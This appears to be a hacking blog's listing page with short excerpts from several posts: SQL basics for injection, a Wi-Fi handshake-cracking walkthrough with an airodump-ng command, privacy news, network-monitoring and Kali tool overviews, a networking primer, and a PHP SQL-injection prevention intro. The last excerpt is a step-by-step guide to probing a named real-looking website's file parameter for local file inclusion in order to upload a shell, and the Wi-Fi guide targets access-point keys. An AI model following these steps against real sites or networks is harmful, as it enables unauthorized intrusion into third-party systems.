Posts

Featured post

Basic of SQL for SQL Injection part 1

Image
In this Tutorial we will discuss some basics of SQL queries and concentrate on queries and basics which will help us while different Phases of Injection. This will be like a crash course of SQL as per the requirements of SQL Injection.   The Hierarchy First of all there are users which can have access to multiple databases, then a database can have multiple tables then a table can have multiple Columns and columns have data in each row.   This is an example database.   Here is an example of the most basic type of Select query. select * from table1 Output will be: Where * stands for all the columns and "table1" is the table name. so for example we do not want all the columns but only some selected colulms in output then the query will be. select column1,column2 from table1 Output will be: so let us try some basic conditions now to limit the output. Select * from students where id=1 Output will be: lets try some other conditions with string type columns. Select *

How to crack Wi-Fi?

Image
How to crack Wi-Fi? I'll explain it to you in a few simple steps. Assumed is that you know how to boot up a Linux environment and how to install a package in it. Ok so first things first. In your Linux distribution install the package "aircrack-ng". It's a suite with some very useful Wi-Fi cracking tools. We'll use 3 of them here. Identify your Wi-Fi card and put it into monitor, as shown in the top left terminal. Mine is wlp3s0. Next, start capturing all traffic from a specific access point. In the top right terminal I've used the following command: $ sudo airodump-ng --essid Alpha -c 6 --write Alpha_CAP wlp3s0 Which means: - Capture the AP that identifies as Alpha. - Stay on channel 6 during the capturing. - Write the output files using Alpha_CAP filename. Then we need to get some users to authenticate to the AP and capture the handshake, as shown in the middle right terminal. You can see that you captured the key when the airodump-ng termin

News: Email Encryption Service Provider ‘ProtonMail’ Now on Tor

Image
Email Encryption Service Provider ‘ProtonMail’ Now on Tor ProtonMail Takes Email Privacy to a Whole New Level by Adding Tor Network’s Support ProtonMail, launched in 2014 by a group of MIT and CERN experts, is the largest email encryption service provider in the world having more than two million users. It is the preferred emailing platform of activists and journalists who need to keep information confidential. In its latest announcement, ProtonMail’s co-founder Dr. Andy Yen stated that they would allow the users to directly access their email accounts via Tor network so that they could counter steps taken by authoritative governments across the globe to minimize user privacy. Dr. Yen said that it is inevitable to avoid censorship in some countries and they have been “proactively working to prevent this.” Dr. Yen further acknowledged that the reason why they have chosen Tor is that “Tor provides a way to circumvent certain Internet blocks so improving our compatibility

NTOPNG - NETWORK TRAFFIC MONITER & USAGE

Image
NTOPNG - NETWORK TRAFFIC MONITER & USAGE ntopng  is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well. ntopng  users can use a a web browser to navigate through ntop (that acts as a web server) traffic information and get a dump of the network status. In the latter case, ntopng can be seen as a simple RMON-like agent with an embedded web interface. The use of: a web interface. limited configuration and administration via the web interface. reduced CPU and memory usage (they vary according to network size and traffic). What ntopng can do for me? Sort network traffic according to many criteria including IP address, port, L7 protocol, throughput, AS. Show network traffic and IPv4/v6 active hosts. Produce long-te

Kali Linux Penetration Testing Tools

Image
Full List of Kali Linux Penetration Testing Tools This reference guide describes every tool one by one and is aimed at anyone who wants to get familiar with digital forensics and penetration testing or refresh their knowledge in these areas with tools available in Kali Linux • Note! I’ve tried to gather as much information as possible, however, even despite that, some entries don’t have information, which I might update if I get more information. Also, mistakes are inevitable • The purpose was to create the most detailed source of every tool in Kali Linux for quick reference and better understanding • Some tools fall under several categories, which means that duplicate entries exist in the full ~670 pages long source • The information about every tool usually consists of: DESCRIPTION, USAGE, EXAMPLE and sometimes OPTIONS and TIPs • Kali Linux tools are not limited to Kali Linux / Backtrack (most can be installed on other Linux distributions taking into considera

Domain Name System, IP & MAC Address

Image
Domain Name System, IP & MAC Address Brief Understanding Of Domain Name System, IP & MAC Address I hope you have read my previous article which was about how data is sent from one computer to another. So every person has an identity by using which other people can identify him. MAC Address So in case of computers/mobiles when a computer is manufactured, they are given a serial number kind of thing to their Network Adapter or NIC (Network Interface Card) called  MAC Address . A MAC Address looks like this 00:A0:C9:24:C3: IP Address But when a device (mobile/computer) is connected to internet then MAC Address can’t be used to identify it. It gets a new identity called IP address. Didn’t get it? When we have to send and receive something from a person who is far away, we need his address right? Well in case of internet an address is called an  IP Address.  and here is how an IP Address looks like 193.178.32.64 But it looks too weird for an address right? It l
Image
Hello there! Today we'll be learning PHP security. Now, this article is aimed to prevent SQL injection on your website/webapp. Before reading this article, you should have a basic knowledge of PHP, SQL, HTML, a little CSS (for we'll be designing our sample web app a little bit) and XAMPP. If you have no idea what those are, please learn the basics of those first before delving into this tutorial. Alright, without any further ado, let's begin!  What is SQL injection? SQL injection is a kind of attack wherein the attacker "injects" SQL commands into the input field and if the website is vulnerable, the attacker can alter, edit, delete and dump data from the Database. How SQL injection works? A normal user would just go and input a normal value. For example, you have a website that lets users view types of fashion depending on the country. The normal user might enter a country let's say "Philippines", after the user enters that, the database w

Upload Shell And Hack Website Using LFI

Image
Upload Shell And Hack Website Using LFI Hack Website Using LFI, Shell Upload Using LFI, Shell Uploading Using /proc/self/environ, Hack Website With /proc/self/environ, LFI, How To Hack With LFI, Shell Uploading Hallo Friends Today I Shown how To Hack A Website using LFI:-   Please Do Not Deafce This   Target Site:-   http://yesdial.co.in   Step:1  Find The LFI Target Point On This Website:-  Target LFI Point:-http://yesdial.co.in/cindex.php?file=search.php&stype=product&inputstring=Astrologers   Step:2  Now Remove All Text After The (.php?file=)   Now Url looking Like This:-  http://yesdial.co.in/cindex.php?file =   Step:3  Put The Back_slash After The (.php?file=/)   Now Url looking Like This:-http://yesdial.co.in/cindex.php?file=/   If You Got Any Error After Puting The (/) Than Chance To Valurnable To LFI IS 80%   If You Seen Datas Are Hide On Website, Than Chance To Valurnable To LFI IS 50-50%   Here Is Hide Datas On Website After Put (/)